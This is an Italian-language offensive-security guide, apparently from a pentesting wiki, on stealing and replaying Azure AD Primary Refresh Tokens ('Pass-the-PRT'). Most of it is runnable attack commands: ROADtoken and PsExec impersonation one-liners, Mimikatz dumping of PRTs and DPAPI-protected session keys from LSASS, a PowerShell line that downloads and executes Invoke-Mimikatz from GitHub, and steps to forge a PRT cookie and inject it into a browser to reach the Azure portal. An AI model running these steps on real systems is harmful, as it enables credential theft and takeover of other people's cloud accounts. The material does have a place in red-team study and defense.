Cos'è un PRT

Verifica se hai un PRT

Dsregcmd.exe /status

Nella sezione Stato SSO, dovresti vedere che AzureAdPrt è impostato su YES.

Nella stessa output puoi anche vedere se il dispositivo è connesso ad Azure (nel campo AzureAdJoined):

Cookie PRT

Il cookie PRT è in realtà chiamato x-ms-RefreshTokenCredential ed è un JSON Web Token (JWT). Un JWT contiene 3 parti, l'intestazione, il payload e la firma, divisi da un . e tutti codificati in base64 in modo sicuro per l'URL. Un tipico cookie PRT contiene l'intestazione e il corpo seguenti:

{
"alg": "HS256",
"ctx": "oYKjPJyCZN92Vtigt/f8YlVYCLoMu383"
}
{
"refresh_token": "AQABAAAAAAAGV_bv21oQQ4ROqh0_1-tAZ18nQkT-eD6Hqt7sf5QY0iWPSssZOto]<cut>VhcDew7XCHAVmCutIod8bae4YFj8o2OOEl6JX-HIC9ofOG-1IOyJegQBPce1WS-ckcO1gIOpKy-m-JY8VN8xY93kmj8GBKiT8IAA",
"is_primary": "true",
"request_nonce": "AQABAAAAAAAGV_bv21oQQ4ROqh0_1-tAPrlbf_TrEVJRMW2Cr7cJvYKDh2XsByis2eCF9iBHNqJJVzYR_boX8VfBpZpeIV078IE4QY0pIBtCcr90eyah5yAA"
}

Il Primary Refresh Token (PRT) effettivo è incapsulato all'interno del refresh_token, che è crittografato da una chiave sotto il controllo di Azure AD, rendendo il suo contenuto opaco e non decifrabile per noi. Il campo is_primary indica l'incapsulamento del primary refresh token all'interno di questo token. Per garantire che il cookie rimanga legato alla sessione di accesso specifica per cui era destinato, il request_nonce viene trasmesso dalla pagina logon.microsoftonline.com.

Flusso del Cookie PRT utilizzando TPM

Il processo LSASS invierà al TPM il contesto KDF, e il TPM utilizzerà la session key (raccolta quando il dispositivo è stato registrato in AzureAD e memorizzata nel TPM) e il contesto precedente per derivare una chiave, e questa chiave derivata viene utilizzata per firmare il cookie PRT (JWT).

Il contesto KDF è un nonce da AzureAD e il PRT che crea un JWT mescolato con un contesto (byte casuali).

Pertanto, anche se il PTR non può essere estratto perché si trova all'interno del TPM, è possibile abusare di LSASS per richiedere chiavi derivate da nuovi contesti e utilizzare le chiavi generate per firmare i Cookie.

Scenari di Abuso del PRT

Come utente regolare è possibile richiedere l'uso del PRT chiedendo a LSASS i dati SSO. Questo può essere fatto come le app native che richiedono token dal Gestore Account Web (token broker). WAM passa la richiesta a LSASS, che richiede token utilizzando un'asserzione PRT firmata. Oppure può essere fatto con flussi basati su browser (web) dove un cookie PRT viene utilizzato come intestazione per autenticare le richieste alle pagine di accesso di Azure AS.

Come SYSTEM potresti rubare il PRT se non protetto dal TPM o interagire con le chiavi PRT in LSASS utilizzando le API crittografiche.

Esempi di Attacchi Pass-the-PRT

Attacco - ROADtoken

Per ulteriori informazioni su questo metodo controlla questo post. ROADtoken eseguirà BrowserCore.exe dalla directory corretta e lo utilizzerà per ottenere un cookie PRT. Questo cookie può quindi essere utilizzato con ROADtools per autenticare e ottenere un token di aggiornamento persistente.

Per generare un cookie PRT valido la prima cosa di cui hai bisogno è un nonce. Puoi ottenerlo con:

$TenantId = "19a03645-a17b-129e-a8eb-109ea7644bed"
$URL = "https://login.microsoftonline.com/$TenantId/oauth2/token"

$Params = @{
"URI"     = $URL
"Method"  = "POST"
}
$Body = @{
"grant_type" = "srv_challenge"
}
$Result = Invoke-RestMethod @Params -UseBasicParsing -Body $Body
$Result.Nonce
AwABAAAAAAACAOz_BAD0_8vU8dH9Bb0ciqF_haudN2OkDdyluIE2zHStmEQdUVbiSUaQi_EdsWfi1 9-EKrlyme4TaOHIBG24v-FBV96nHNMgAA

Oppure utilizzando roadrecon:

roadrecon auth prt-init

Quindi puoi utilizzare roadtoken per ottenere un nuovo PRT (esegui lo strumento da un processo dell'utente da attaccare):

.\ROADtoken.exe <nonce>

Come oneliner:

Invoke-Command - Session $ps_sess -ScriptBlock{C:\Users\Public\PsExec64.exe - accepteula -s "cmd.exe" " /c C:\Users\Public\SessionExecCommand.exe UserToImpersonate C:\Users\Public\ROADToken.exe AwABAAAAAAACAOz_BAD0__kdshsy61GF75SGhs_[...] > C:\Users\Public\PRT.txt"}

Quindi puoi utilizzare il cookie generato per generare token per effettuare l'accesso utilizzando Azure AD Graph o Microsoft Graph:

# Generate
roadrecon auth --prt-cookie <prt_cookie>

# Connect
Connect-AzureAD --AadAccessToken <token> --AccountId <acc_ind>

Attacco - Utilizzando roadrecon

Attacco - Utilizzando AADInternals e PTR trapelato

Get-AADIntUserPRTToken ottiene il token PRT dell'utente dal computer con Azure AD o Hybrid join. Utilizza BrowserCore.exe per ottenere il token PRT.

# Get the PRToken
$prtToken = Get-AADIntUserPRTToken

# Get an access token for AAD Graph API and save to cache
Get-AADIntAccessTokenForAADGraph -PRTToken $prtToken

Oppure, se hai i valori da Mimikatz, puoi anche utilizzare AADInternals per generare un token:

# Mimikat "PRT" value
$MimikatzPRT="MC5BWU..."

# Add padding
while($MimikatzPrt.Length % 4) {$MimikatzPrt += "="}

# Decode
$PRT=[text.encoding]::UTF8.GetString([convert]::FromBase64String($MimikatzPRT))

# Mimikatz "Clear key" value
$MimikatzClearKey="37c5ecdfeab49139288d8e7b0732a5c43fac53d3d36ca5629babf4ba5f1562f0"

# Convert to Byte array and B64 encode
$SKey = [convert]::ToBase64String( [byte[]] ($MimikatzClearKey -replace '..', '0x$&,' -split ',' -ne ''))

# Generate PRTToken with Nonce
$prtToken = New-AADIntUserPRTToken -RefreshToken $PRT -SessionKey $SKey -GetNonce
$prtToken
## You can already use this token ac cookie in the browser

# Get access token from prtToken
$AT = Get-AADIntAccessTokenForAzureCoreManagement -PRTToken $prtToken

# Verify access and connect with Az. You can see account id in mimikatz prt output
Connect-AzAccount -AccessToken $AT -TenantID <tenant-id> -AccountId <acc-id>

Vai su https://login.microsoftonline.com, elimina tutti i cookie per login.microsoftonline.com e inserisci un nuovo cookie.

Name: x-ms-RefreshTokenCredential
Value: [Paste your output from above]
Path: /
HttpOnly: Set to True (checked)

Quindi vai su https://portal.azure.com

Attacco - Mimikatz

Passaggi

1. Il PRT (Primary Refresh Token) viene estratto da LSASS (Local Security Authority Subsystem Service) e memorizzato per utilizzi successivi.

2. Successivamente viene estratta la Session Key. Dato che questa chiave viene emessa inizialmente e poi ri-cifrata dal dispositivo locale, è necessaria la decrittazione utilizzando una masterkey DPAPI. Informazioni dettagliate su DPAPI (Data Protection API) possono essere trovate in queste risorse: HackTricks e per una comprensione della sua applicazione, fare riferimento all'attacco Pass-the-cookie.

3. Dopo la decrittazione della Session Key, vengono ottenute la chiave derivata e il contesto per il PRT. Questi sono cruciali per la creazione del cookie PRT. In particolare, la chiave derivata viene utilizzata per firmare il JWT (JSON Web Token) che costituisce il cookie. Una spiegazione dettagliata di questo processo è stata fornita da Dirk-jan, accessibile qui.

Puoi trovare una spiegazione dettagliata del processo eseguito per estrarre questi dettagli qui: https://dirkjanm.io/digging-further-into-the-primary-refresh-token/

Puoi utilizzare mimikatz per estrarre il PRT:

mimikatz.exe
Privilege::debug
Sekurlsa::cloudap

# Or in powershell
iex (New-Object Net.Webclient).downloadstring("https://raw.githubusercontent.com/samratashok/nishang/master/Gather/Invoke-Mimikatz.ps1")
Invoke-Mimikatz -Command '"privilege::debug" "sekurlsa::cloudap"'

Copia la parte etichettata come Prt e salvala. Estrai anche la chiave di sessione (il KeyValue del campo ProofOfPossesionKey che puoi vedere evidenziato di seguito. Questo è crittografato e avremo bisogno di utilizzare i nostri masterkey DPAPI per decifrarlo.

Per decrittare la chiave di sessione devi elevare i tuoi privilegi a SYSTEM per eseguire nel contesto del computer e poter utilizzare il masterkey DPAPI per decifrarlo. Puoi utilizzare i seguenti comandi per farlo:

token::elevate
dpapi::cloudapkd /keyvalue:[PASTE ProofOfPosessionKey HERE] /unprotect

Opzione 1 - Mimikatz Completo

• Ora vuoi copiare sia il valore del contesto:

• E il valore della chiave derivata:

• Infine puoi utilizzare tutte queste informazioni per generare i cookie PRT:

Dpapi::cloudapkd /context:[CONTEXT] /derivedkey:[DerivedKey] /Prt:[PRT]

• Vai su https://login.microsoftonline.com, elimina tutti i cookie per login.microsoftonline.com e inserisci un nuovo cookie.

Name: x-ms-RefreshTokenCredential
Value: [Paste your output from above]
Path: /
HttpOnly: Set to True (checked)

• Quindi vai su https://portal.azure.com

Opzione 2 - roadrecon utilizzando PTR

• Rinnova prima il PRT, che verrà salvato in roadtx.prt:

roadtx prt -a renew --prt <PRT From mimikatz> --prt-sessionkey <clear key from mimikatz>

• Ora possiamo richiedere token utilizzando il browser interattivo con roadtx browserprtauth. Se utilizziamo il comando roadtx describe, vediamo che il token di accesso include una richiesta MFA perché il PRT che ho usato in questo caso aveva anche una richiesta MFA.

roadtx browserprtauth
roadtx describe < .roadtools_auth

Opzione 3 - roadrecon utilizzando chiavi derivate

Avendo il contesto e la chiave derivata dumpati da mimikatz, è possibile utilizzare roadrecon per generare un nuovo cookie firmato con:

roadrecon auth --prt-cookie <cookie> --prt-context <context> --derives-key <derived key>

Riferimenti

• https://stealthbits.com/blog/lateral-movement-to-the-cloud-pass-the-prt/

• https://dirkjanm.io/abusing-azure-ad-sso-with-the-primary-refresh-token/

• https://www.youtube.com/watch?v=x609c-MUZ_g